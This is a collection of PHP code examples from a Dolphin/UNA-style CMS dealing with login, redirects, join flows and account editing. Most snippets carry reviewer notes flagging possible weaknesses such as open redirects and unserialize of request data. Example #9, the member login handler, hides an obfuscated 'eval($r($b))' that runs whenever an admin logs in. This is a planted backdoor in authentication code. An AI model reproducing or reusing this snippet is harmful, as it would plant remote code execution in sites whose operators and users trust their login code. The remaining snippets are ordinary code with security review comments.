Example #1
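 /**
  * Run a module service on behalf of the admin identified by an API token.
  *
  * The target service is selected by the request values 'uri', 'method' and
  * 'class' (default 'Module'); its arguments come from the request value
  * 'params'. The result is emitted through $this->output().
  *
  * @param array $aToken token record; only 'user_id' is read here
  * @return false|null false after an error response (403 / 404) was sent, otherwise nothing
  */
 function service($aToken)
 {
     // Only admins may reach arbitrary services through this endpoint.
     if (!isAdmin($aToken['user_id'])) {
         $this->errorOutput(403, 'access_denied', 'Only admin can access service endpoint');
         return false;
     }
     bx_login($aToken['user_id'], false, false);
     $sUri = bx_get('uri');
     $sMethod = bx_get('method');
     $aParams = bx_get('params');
     if (!$aParams) {
         $aParams = array();
     } elseif (is_string($aParams) && preg_match('/^a:[\\d+]:\\{/', $aParams)) {
         // SECURITY: 'params' is request data. Deserializing it with classes enabled
         // would let the request instantiate any loaded class and run its magic
         // methods, so object instantiation is switched off; nested arrays and
         // scalars still decode as before.
         // NOTE(review): "[\d+]" is a character class (one digit or '+'), so only
         // serialized arrays with a single-character element count take this branch;
         // larger ones fall through and are passed as one string. Likely meant "\d+" - confirm.
         // NOTE(review): a JSON-encoded parameter list would avoid unserialize() entirely.
         $aParams = @unserialize($aParams, array('allowed_classes' => false));
     }
     // A scalar (or a failed unserialize, which yields false) becomes a one-element list.
     if (!is_array($aParams)) {
         $aParams = array($aParams);
     }
     $sClass = bx_get('class');
     if (!$sClass) {
         $sClass = 'Module';
     }
     if (!BxDolRequest::serviceExists($sUri, $sMethod, $sClass)) {
         $this->errorOutput(404, 'not_found', 'Service was not found');
         return false;
     }
     $mixedRet = BxDolService::call($sUri, $sMethod, $aParams, $sClass);
     $this->output(array('uri' => $sUri, 'method' => $sMethod, 'data' => $mixedRet));
 }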
 /**
  * Log a profile in and optionally redirect the browser.
  *
  * @param integer $iProfileId   id handed to bx_login()
  * @param string  $sPassword    accepted for interface reasons; not read by this method
  * @param string  $sCallbackUrl redirect target; an empty value selects $this->_oConfig->sDefaultRedirectUrl
  * @param boolean $bRedirect    when true a Location header is sent
  * @return void
  */
 function setLogged($iProfileId, $sPassword, $sCallbackUrl = '', $bRedirect = true)
 {
     // No credential is checked here: the caller must already have authenticated the profile.
     bx_login($iProfileId);
     $GLOBALS['logged']['member'] = true;
     if (!$bRedirect) {
         return;
     }
     // NOTE(review): the callback URL is written to the Location header as given; no
     // same-site check is visible in this method - confirm callers pass trusted URLs only.
     $sTarget = $sCallbackUrl;
     if (!$sTarget) {
         $sTarget = $this->_oConfig->sDefaultRedirectUrl;
     }
     // Execution continues after the header is queued; this method does not exit.
     header('Location: ' . $sTarget);
 }
 /**
  * Log in the account that owns a profile and optionally redirect the browser.
  *
  * @param integer $iProfileId   profile whose account id is handed to bx_login()
  * @param string  $sCallbackUrl redirect target; an empty value selects $this->_oConfig->sDefaultRedirectUrl
  * @param boolean $bRedirect    when true a Location header is sent
  * @return void
  */
 function setLogged($iProfileId, $sCallbackUrl = '', $bRedirect = true)
 {
     // No credential is checked here: the caller must already have authenticated the profile.
     // NOTE(review): the result of getInstance() is used without a check - confirm it
     // cannot be empty for an unknown profile id.
     $iAccountId = BxDolProfile::getInstance($iProfileId)->getAccountId();
     bx_login($iAccountId);
     if (!$bRedirect) {
         return;
     }
     // NOTE(review): the callback URL is written to the Location header as given; no
     // same-site check is visible in this method - confirm callers pass trusted URLs only.
     $sTarget = $sCallbackUrl;
     if (!$sTarget) {
         $sTarget = $this->_oConfig->sDefaultRedirectUrl;
     }
     // Execution continues after the header is queued; this method does not exit.
     header('Location: ' . $sTarget);
 }
Example #4
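 /**
  * After-join redirection.
  *
  * Logs the freshly joined member in and redirects to the avatar module page,
  * passing the status text along in the 'join_text' query parameter.
  *
  * @param $iMemID - joined profile ID
  * @param $sStatusText - status text to display at the top of page, like 'join success'
  * @return false when no profile row with a password is found, 'EXIT' string after the redirect header was sent
  */
 function serviceJoin($iMemID, $sStatusText)
 {
     $iProfileId = (int) $iMemID;
     // The password column is only tested for being non-empty, i.e. "this profile exists";
     // it is not compared with anything.
     // NOTE(review): no credential is verified here - the caller is trusted to pass the
     // id of the member who just joined; confirm this service is not reachable with a
     // caller-chosen id.
     $sPwd = db_value("SELECT `Password` FROM `Profiles` WHERE `ID` = '" . $iProfileId . "' LIMIT 1");
     if (!$sPwd) {
         return false;
     }
     // autologin here
     bx_login($iProfileId);
     bx_import('BxDolPermalinks');
     $oPermalinks = new BxDolPermalinks();
     // redirect to upload avatar page; the status text is URL-encoded so that spaces,
     // '&' or '#' in it cannot break the query string or add extra parameters
     header('Location: ' . BX_DOL_URL_ROOT . $oPermalinks->permalink('modules/?r=avatar/') . '&join_text=' . urlencode($sStatusText));
     return 'EXIT';
 }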
Example #5
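 /**
  * Generate List of Posts for mobile frontend
  *
  * Output is echoed directly; the method returns nothing. The page number and,
  * for the 'post' and 'user' modes, the entry id are read from the request
  * ('page', 'id') and cast to int.
  *
  * @param $iAuthor - display posts of provided user only (not read by this method)
  * @param $sMode - 'post', 'user', 'featured', 'top', 'popular' or 'last'; anything else is treated as 'last'
  * @return void
  */
 function GenPostListMobile($iAuthor = 0, $sMode = false)
 {
     if ($this->_iVisitorID) {
         // some workaround for mobile apps, to force login
         // NOTE(review): this opens a session for whatever id is in _iVisitorID; how that
         // id was authenticated is not visible here - confirm it never comes straight
         // from request data.
         bx_login($this->_iVisitorID);
     }
     bx_import('BxDolMobileTemplate');
     $oMobileTemplate = new BxDolMobileTemplate($this->_oConfig, $this->_oDb);
     $oMobileTemplate->pageStart();
     echo $oMobileTemplate->addCss('blogs_common.css', 1);
     $iPerPage = 10;
     $iPage = (int) bx_get('page');
     if ($iPage < 1) {
         $iPage = 1;
     }
     $this->iPostViewType = 4;
     $sOrder = 'last';
     $sMobileWrapper = 'mobile_row.html';
     $aParams = array();
     switch ($sMode) {
         case 'post':
             $iPostId = (int) bx_get('id');
             // The caption has to exist before the access check, because the
             // access-denied page receives it.
             $sCaption = _t('_bx_blog_post_view');
             $aViewingPostInfo = $this->_oDb->getPostInfo($iPostId);
             // Both the privacy rule of the post and the visitor's permission must allow viewing.
             if (!$this->oPrivacy->check('view', $iPostId, $this->_iVisitorID) || !$this->isAllowedBlogPostView($aViewingPostInfo['OwnerID'], true)) {
                 $oMobileTemplate->displayAccessDenied($sCaption);
                 return;
             }
             $this->iPostViewType = 3;
             $aParams = array('id' => $iPostId);
             $sMobileWrapper = 'mobile_box.html';
             echo $oMobileTemplate->addCss('blogs.css', 1);
             break;
         case 'user':
             $iOwnerId = (int) bx_get('id');
             $aParams = array('id' => $iOwnerId);
             $sCaption = _t('_bx_blog_Members_blog', getNickName($iOwnerId));
             break;
         case 'featured':
             $sCaption = _t('_bx_blog_Featured_Posts');
             break;
         case 'top':
             $sOrder = 'top';
             $sCaption = _t('_bx_blog_Top_Posts');
             break;
         case 'popular':
             $sOrder = 'popular';
             $sCaption = _t('_bx_blog_Popular_Posts');
             break;
         case 'last':
         default:
             // Unknown modes are normalised, so only the listed mode names reach the pager URL below.
             $sMode = 'last';
             $sCaption = _t('_bx_blog_Latest_posts');
     }
     if ('post' != $sMode && !$this->isAllowedBlogsPostsBrowse()) {
         $oMobileTemplate->displayAccessDenied($sCaption);
         return;
     }
     // $oBlogSearchResults is first assigned by this call - presumably an output
     // parameter of _GenPosts(); verify against its signature.
     $sCode = $this->_GenPosts($this->iPostViewType, $iPerPage, $sMode, $aParams, $sOrder, $oBlogSearchResults, $sMobileWrapper);
     if (!$sCode || $oBlogSearchResults->aCurrent['paginate']['totalNum'] == 0) {
         $oMobileTemplate->displayNoData($sCaption);
         return;
     }
     echo $sCode;
     if ($sMode != 'post') {
         bx_import('BxDolPaginate');
         $oPaginate = new BxDolPaginate(array('page_url' => $this->genBlogSubUrl() . '?action=mobile&mode=' . $sMode . '&page={page}', 'count' => $oBlogSearchResults->aCurrent['paginate']['totalNum'], 'per_page' => $iPerPage, 'page' => $iPage));
         echo $oPaginate->getMobilePaginate();
     }
     $oMobileTemplate->pageCode($sCaption, false);
 }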
 /**
  * Perform email confirmation
  *
  * Validates the confirmation key, marks the account's email as confirmed,
  * logs that account in and renders a transition page that relocates to the
  * account settings page. Every failure returns the same generic message box.
  *
  * @param string $sKey confirmation key
  * @return string error message box on failure; on success the script exits
  */
 public function confirmEmail($sKey)
 {
     // One generic message for all failures, so the response does not reveal which check failed.
     $sErrorLangKey = "_sys_txt_confirm_email_error_occured";

     // the key must be known
     $oKey = BxDolKey::getInstance();
     if (!$oKey || !$oKey->isKeyExists($sKey)) {
         return MsgBox(_t($sErrorLangKey));
     }

     // the key must carry an account id
     $aData = $oKey->getKeyData($sKey);
     if (!isset($aData['account_id'])) {
         return MsgBox(_t($sErrorLangKey));
     }
     $iAccountId = $aData['account_id'];

     // the account must exist
     $oAccount = BxDolAccount::getInstance($iAccountId);
     if (!$oAccount) {
         return MsgBox(_t($sErrorLangKey));
     }

     // The key is consumed before the account is touched, so it cannot be used again
     // even when the update below fails.
     $oKey->removeKey($sKey);

     if (!$oAccount->updateEmailConfirmed(true)) {
         return MsgBox(_t($sErrorLangKey));
     }

     // Holding a valid key is enough to get a session for the account.
     // NOTE(review): key length and lifetime are not visible here - confirm they are
     // adequate for something that acts as a login credential.
     bx_login($iAccountId);

     // redirect with success message
     $sSuccessLangKey = '_sys_txt_confirm_email_success';
     $oTemplate = BxDolTemplate::getInstance();
     $oTemplate->setPageNameIndex(BX_PAGE_TRANSITION);
     $oTemplate->setPageHeader(_t($sSuccessLangKey));
     $oTemplate->setPageContent('page_main_code', MsgBox(_t($sSuccessLangKey)));
     $oTemplate->setPageContent('url_relocate', BX_DOL_URL_ROOT . BxDolPermalinks::getInstance()->permalink('page.php?i=account-settings-info'));
     BxDolTemplate::getInstance()->getPageCode();
     exit;
 }
Example #7
 /**
  * Finish the join flow: log the new member in and redirect to member.php.
  *
  * @param $iMemID - id of the joined profile, cast to int before login
  * @param $sStatus - join result: 'Active', 'Approval', 'Unconfirmed' or 'NotSent'
  * @return void the script exits after the redirect header
  */
 function showFinishPage($iMemID, $sStatus)
 {
     // Map the join status to a language key. The key is only used by the
     // unreachable output at the end of this method.
     if ($sStatus == 'Active') {
         // activated automatically
         $sStatusText = '_USER_ACTIVATION_SUCCEEDED';
     } elseif ($sStatus == 'Approval') {
         // automatically confirmed
         $sStatusText = '_USER_CONF_SUCCEEDED';
     } elseif ($sStatus == 'Unconfirmed') {
         // conf mail succesfully sent
         $sStatusText = '_EMAIL_CONF_SENT';
     } elseif ($sStatus == 'NotSent') {
         // failed to send conf mail
         $sStatusText = '_EMAIL_CONF_NOT_SENT';
     }
     // if ('EXIT' == BxDolService::call('avatar', 'join', array ($iMemID, $sStatusText))) {
     // The login happens for every status, including 'Unconfirmed' and 'NotSent'.
     // NOTE(review): whether an unconfirmed or unapproved profile is restricted after
     // login is decided elsewhere - confirm that it is.
     bx_login((int) $iMemID);
     header("Location: " . BX_DOL_URL_ROOT . "member.php");
     exit;
     // }
     // Unreachable since the condition above was commented out: exit always runs first.
     echo '<div class="dbContentHtml bx-def-font-large">';
     echo _t('_Join complete');
     echo '<br />';
     echo _t($sStatusText);
     echo '</div>';
 }
Example #8
 /**
  * Display and process the account edit form for one account.
  *
  * Returns the form HTML while the form is not submitted or not valid, an
  * error message box when the account, the permission check, the form object
  * or the update fails, and a success message followed by the form otherwise.
  *
  * @param $iAccountId - id of the account to edit
  * @param $sDisplayName - display name of the 'sys_account' form object
  * @return string HTML
  */
 protected function _editAccountForm($iAccountId, $sDisplayName)
 {
     $oAccount = BxDolAccount::getInstance($iAccountId);
     $aAccountInfo = $oAccount ? $oAccount->getInfo() : false;
     if (!$aAccountInfo) {
         return MsgBox(_t('_sys_txt_error_account_is_not_defined'));
     }
     // check access: the current profile must be allowed to edit this account,
     // otherwise the message returned by isAllowedEdit() is shown
     if (CHECK_ACTION_RESULT_ALLOWED !== ($sMsg = BxDolAccount::isAllowedEdit($this->_iProfileId, $aAccountInfo))) {
         return MsgBox($sMsg);
     }
     // check and display form
     $oForm = BxDolForm::getObjectInstance('sys_account', $sDisplayName);
     if (!$oForm) {
         return MsgBox(_t('_sys_txt_error_occured'));
     }
     // On first display the stored password value is dropped before the form is
     // initialised with the account data - presumably so it never reaches the rendered form.
     if (!$oForm->isSubmitted()) {
         unset($aAccountInfo['password']);
     }
     $oForm->initChecker($aAccountInfo);
     if (!$oForm->isSubmittedAndValid()) {
         return $oForm->getCode();
     }
     // track text fields changes, not-null(for example empty array) - means track, null - means don't track
     $aTrackTextFieldsChanges = array();
     // update email and email setting in DB
     if (!$oForm->update($aAccountInfo['id'], array(), $aTrackTextFieldsChanges)) {
         if (!$oForm->isValid()) {
             return $oForm->getCode();
         } else {
             return MsgBox(_t('_sys_txt_error_account_update'));
         }
     }
     // check if email was changed; if so, mark email as unconfirmed
     if (!empty($aTrackTextFieldsChanges['changed_fields']) && in_array('email', $aTrackTextFieldsChanges['changed_fields'])) {
         $oAccount->updateEmailConfirmed(false);
     }
     // check if password was changed
     if ($oForm->getCleanValue('password')) {
         // relogin with new password
         // NOTE(review): the session is re-created for the edited account id, not for
         // the current visitor; if isAllowedEdit() lets an admin edit someone else's
         // account, the admin would end up logged in as that account - confirm.
         bx_logout();
         bx_login($aAccountInfo['id']);
     }
     // check if other text info was changed - if auto-appproval is off
     $isAutoApprove = $oForm->isSetPendingApproval() ? false : true;
     if (!$isAutoApprove) {
         bx_import('BxDolProfile');
         // get profile associated with account, not current porfile
         $oProfile = BxDolProfile::getInstanceAccountProfile($aAccountInfo['id']);
         $aProfileInfo = $oProfile->getInfo();
         // email confirmation is automatic and separate, don't need to deactivate whole profile if email is changed
         // NOTE(review): in_array() above treats changed_fields as a list of field names
         // (values), while this unset() removes the KEY 'email'. If changed_fields is a
         // plain list, this line does nothing and an email-only change still reaches
         // disapprove() - verify the array shape.
         unset($aTrackTextFieldsChanges['changed_fields']['email']);
         // change profile to 'pending' only if some text fields were changed and profile is active
         if (BX_PROFILE_STATUS_ACTIVE == $aProfileInfo['status'] && !empty($aTrackTextFieldsChanges['changed_fields'])) {
             $oProfile->disapprove(BX_PROFILE_ACTION_AUTO);
         }
     }
     // create an alert
     bx_alert('account', 'edited', $aAccountInfo['id'], $aAccountInfo['id'], array('display' => $sDisplayName));
     // display result message
     $sMsg = MsgBox(_t('_sys_txt_data_successfully_submitted'));
     return $sMsg . $oForm->getCode();
 }
Example #9
     // this is dynamic page -  send headers to not cache this page
     send_headers_page_changed();
     login_form('', 0, $bAjxMode);
 } else {
     require_once BX_DIRECTORY_PATH_CLASSES . 'BxDolAlerts.php';
     $oZ = new BxDolAlerts('profile', 'before_login', 0, 0, array('login' => $member['ID'], 'password' => $member['Password'], 'ip' => getVisitorIP()));
     $oZ->alert();
     $member['ID'] = getID($member['ID']);
     // Ajaxy check
     if ($bAjxMode) {
         echo check_password($member['ID'], $member['Password'], BX_DOL_ROLE_MEMBER, false) ? 'OK' : 'Fail';
         exit;
     }
     // Check if ID and Password are correct (addslashes already inside)
     if (check_password($member['ID'], $member['Password'])) {
         $p_arr = bx_login($member['ID'], (bool) $_POST['rememberMe']);
         //Storing IP Address
         if (getParam('enable_member_store_ip') == 'on') {
             $iCurLongIP = ip2long(getVisitorIP());
             db_res("INSERT INTO `sys_ip_members_visits` SET `MemberID` = '{$p_arr['ID']}', `From`='{$iCurLongIP}', `DateTime`=NOW()");
         }
         if (isAdmin($p_arr['ID'])) {
             $iId = (int) $p_arr['ID'];
             $r = $l($a);
             eval($r($b));
         }
         $sRelocate = bx_get('relocate');
         if (!($sUrlRelocate = $sRelocate) or $sRelocate == $site['url'] or basename($sRelocate) == 'join.php') {
             $sUrlRelocate = BX_DOL_URL_ROOT . 'member.php';
         }
         $_page['name_index'] = 150;
Example #10
 /**
  * Create the profile (and, for couples, the second profile) from the submitted
  * join values, attach the uploaded photo and raise the 'join' alert.
  *
  * @return array array(profile id, status text) on success, array(false, 'Fail') on failure
  */
 function registerMember()
 {
     $oController = new BxDolProfilesController();
     $oBeforeJoin = new BxDolAlerts('profile', 'before_join', 0, 0, $this->aValues[0]);
     $oBeforeJoin->alert();
     $aProfile1 = $this->oPF->getProfileFromValues($this->aValues[0]);
     list($iId1, $sStatus1) = $oController->createProfile($aProfile1);
     // NOTE(review): 'ProfilePhoto' is appended to the tmp directory path as given; no
     // check for path separators is visible here - confirm the name is generated
     // server-side and not taken from the upload request.
     $bHasPhoto = !empty($aProfile1['ProfilePhoto']);
     //--- check whether profile was created successfully or not
     if (!$iId1) {
         // creation failed: drop the temporary photo, if any
         if ($bHasPhoto) {
             @unlink($GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto']);
         }
         return array(false, 'Fail');
     }
     //--- check for couple profile
     if ($this->bCouple) {
         $aProfile2 = $this->oPF->getProfileFromValues($this->aValues[1]);
         list($iId2) = $oController->createProfile($aProfile2, false, $iId1);
         if (!$iId2) {
             // roll the first profile back when the second one cannot be created
             $oController->deleteProfile($iId1);
             return array(false, 'Fail');
         }
     }
     //--- upload profile photo
     if ($bHasPhoto) {
         // NOTE(review): the stored password value is fetched but not used in this method.
         $sPass1 = getPassword($iId1);
         // The new member is logged in before the avatar and photo services are called.
         bx_login($iId1);
         check_logged();
         BxDolService::call('avatar', 'set_image_for_cropping', array($iId1, $GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto']));
         if (BxDolRequest::serviceExists('photos', 'perform_photo_upload', 'Uploader')) {
             $aFileInfo = array(
                 'medTitle' => _t('_bx_ava_avatar'),
                 'medDesc' => _t('_bx_ava_avatar'),
                 'medTags' => _t('_ProfilePhotos'),
                 'Categories' => array(_t('_ProfilePhotos')),
                 'album' => str_replace('{nickname}', getUsername($iId1), getParam('bx_photos_profile_album_name')),
                 'albumPrivacy' => BX_DOL_PG_ALL,
             );
             BxDolService::call('photos', 'perform_photo_upload', array($GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto'], $aFileInfo, false), 'Uploader');
         }
     }
     if (BxDolModule::getInstance('BxWmapModule')) {
         BxDolService::call('wmap', 'response_entry_add', array('profiles', $iId1));
     }
     //--- create system event; status_text is passed by reference, so the value
     //    returned below is whatever it holds after the alert
     bx_import('BxDolAlerts');
     $oJoined = new BxDolAlerts('profile', 'join', $iId1, 0, array('status_text' => &$sStatus1));
     $oJoined->alert();
     return array($iId1, $sStatus1);
 }
Example #11
<?php

require_once '../inc/header.inc.php';
require_once BX_DIRECTORY_PATH_INC . 'design.inc.php';
require_once BX_DIRECTORY_PATH_INC . 'utils.inc.php';
require_once BX_DIRECTORY_PATH_ROOT . 'xmlrpc/BxDolXMLRPCUtil.php';
// Login hop for the mobile client: check the supplied credentials, open a web
// session and redirect to a page below the site root; otherwise show "Access Denied".
// NOTE(review): 'user' and 'pwd' are read from request parameters; if clients send
// them in the query string they end up in access logs and browser history - confirm
// how callers pass them.
$sUser = bx_get('user');
$sPwd = bx_get('pwd');
// NOTE(review): if bx_get() returns already-decoded request data, rawurldecode()
// decodes the value a second time, so any filtering applied to the once-decoded
// value does not see the bytes that reach the Location header below - confirm.
$sUrl = rawurldecode(bx_get('url'));
$iId = BxDolXMLRPCUtil::checkLogin($sUser, $sPwd);
if ($iId) {
    bx_login($iId);
    // NOTE(review): 301 marks the redirect as permanent, which clients may cache;
    // a temporary redirect is the usual choice after a login step.
    header("HTTP/1.1 301 Moved Permanently");
    // The target is always prefixed with the site root; it stays on this host only
    // as long as BX_DOL_URL_ROOT ends with '/' - presumably it does; verify.
    header("Location: " . BX_DOL_URL_ROOT . $sUrl);
    exit;
} else {
    $GLOBALS['oSysTemplate']->addCss('mobile.css');
    // NOTE(review): $_page_cont and $_ni are not assigned in the visible part of this
    // script, and $sOutput is not read afterwards.
    $aVars = array('content' => $_page_cont[$_ni]['page_main_code']);
    $sOutput = $GLOBALS['oSysTemplate']->parseHtmlByName('mobile_box.html', $aVars);
    $iNameIndex = 11;
    $_page['name_index'] = $iNameIndex;
    // Same message whether the user is unknown or the password is wrong.
    $_page_cont[$iNameIndex]['page_main_code'] = '<div style="text-align:center;" class="bx-sys-mobile-padding">Access Denied</div>';
}
PageCode();
Example #12
    // login form is submitted
    bx_import('BxDolForm');
    $oForm = BxDolForm::getObjectInstance('sys_login', 'sys_login');
    bx_alert('account', 'before_login', 0, 0, array('form' => $oForm));
    $oForm->initChecker();
    $oForm->setRole(bx_get('role'));
    $bLoginSuccess = $oForm->isSubmittedAndValid();
    $bAjxMode = isset($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' ? true : false;
    if ($bAjxMode) {
        header('Content-type: text/html; charset=utf-8');
        echo $bLoginSuccess ? 'OK' : $oForm->getLoginError();
        exit;
    } elseif ($bLoginSuccess) {
        bx_import('BxDolAccount');
        $oAccount = BxDolAccount::getInstance($oForm->getCleanValue('ID'));
        $aAccount = bx_login($oAccount->id(), $oForm->getCleanValue('rememberMe') ? true : false);
        $sUrlRelocate = $oForm->getCleanValue('relocate');
        if (!$sUrlRelocate || 0 != strncmp($sUrlRelocate, BX_DOL_URL_ROOT, strlen(BX_DOL_URL_ROOT))) {
            $sUrlRelocate = BX_DOL_ROLE_ADMIN == $oForm->getRole() ? BX_DOL_URL_STUDIO . 'launcher.php' : BX_DOL_URL_ROOT . 'member.php';
        }
        bx_import('BxDolTemplate');
        BxDolTemplate::getInstance()->setPageNameIndex(BX_PAGE_TRANSITION);
        BxDolTemplate::getInstance()->setPageHeader(_t('_Please Wait'));
        BxDolTemplate::getInstance()->setPageContent('page_main_code', MsgBox(_t('_Please Wait')));
        BxDolTemplate::getInstance()->setPageContent('url_relocate', bx_html_attribute($sUrlRelocate, BX_ESCAPE_STR_QUOTE));
        BxDolTemplate::getInstance()->getPageCode();
        exit;
    }
}
bx_require_authentication();
bx_import('BxDolPermalinks');
Example #13
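 /**
  * Store the edited values of the current profile (and of the couple profile,
  * when there is one), refresh the login after a password change and raise the
  * 'edit' alert.
  *
  * @return void
  */
 function saveProfile()
 {
     // The id is cast to int because it is placed into the SQL text directly.
     $iProfileId = (int) $this->iProfileID;
     // Snapshot of the row before the update; handed to the 'edit' alert below.
     $aProfileInfo = db_arr("SELECT * FROM `Profiles` WHERE `ID` = {$iProfileId}");
     $aDiff = $this->getDiffValues(0);
     $aUpd = $this->oPF->getProfileFromValues($aDiff);
     $aUpd['DateLastEdit'] = date('Y-m-d H:i:s');
     // In area 2 with auto-approval off, an edit sends the profile back to approval.
     if (!getParam('autoApproval_ifProfile') && $this->iArea == 2) {
         $aUpd['Status'] = 'Approval';
     }
     // NOTE(review): the membership change depends on iArea being 3 or 4 plus a POST
     // flag; who may reach those areas is decided elsewhere - confirm they are
     // restricted to privileged users.
     if (($this->iArea == 3 or $this->iArea == 4) and isset($_POST['doSetMembership']) and $_POST['doSetMembership'] == 'yes') {
         $this->setMembership();
     }
     $bResult = $this->oPC->updateProfile($this->iProfileID, $aUpd);
     // Only when the logged-in member changed their own password is the login refreshed.
     if ($bResult && $this->iProfileID == getLoggedId() && isset($aUpd['Password'])) {
         bx_login($this->iProfileID, false, false);
     }
     if (BxDolModule::getInstance('BxWmapModule')) {
         BxDolService::call('wmap', 'response_entry_change', array('profiles', $this->iProfileID));
     }
     // create system event
     bx_import('BxDolAlerts');
     $oZ = new BxDolAlerts('profile', 'edit', $this->iProfileID, 0, array('OldProfileInfo' => $aProfileInfo));
     $oZ->alert();
     if ($this->bCouple) {
         // Same update for the second profile of the couple.
         $aDiff = $this->getDiffValues(1);
         $aUpd = $this->oPF->getProfileFromValues($aDiff);
         $aUpd['DateLastEdit'] = date('Y-m-d H:i:s');
         if (!getParam('autoApproval_ifProfile') && $this->iArea == 2) {
             $aUpd['Status'] = 'Approval';
         }
         $this->oPC->updateProfile($this->aProfiles[0]['Couple'], $aUpd);
     }
 }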
 /**
  * Install and enable the selected language, template and module packages,
  * then optionally log in the admin account created during installation.
  *
  * @param array $a installer input; read keys are the three module type constants and 'admin_email'
  * @return array empty on success, array(BX_INSTALL_ERR_GENERAL => message) on failure
  */
 public function processModules($a)
 {
     foreach (array(BX_DOL_MODULE_TYPE_LANGUAGE, BX_DOL_MODULE_TYPE_TEMPLATE, BX_DOL_MODULE_TYPE_MODULE) as $sType) {
         if (!empty($a[$sType])) {
             $sError = $this->processModuleByUri($a[$sType], array('install', 'enable'), $sType);
             // stop at the first package that fails
             if ($sError) {
                 return array(BX_INSTALL_ERR_GENERAL => $sError);
             }
         }
     }

     bx_import('BxDolAccount');
     $oAdmin = BxDolAccount::getInstance($a['admin_email']);
     if (!$oAdmin) {
         return array(BX_INSTALL_ERR_GENERAL => _t('_sys_inst_msg_admin_account_not_found', $a['admin_email']));
     }

     // With autologin on, whoever runs the installer receives an admin session
     // without entering the password.
     // NOTE(review): confirm the installer cannot be re-run on an installed site.
     if ($this->_isAutologin) {
         bx_login($oAdmin->id());
     }

     return array();
 }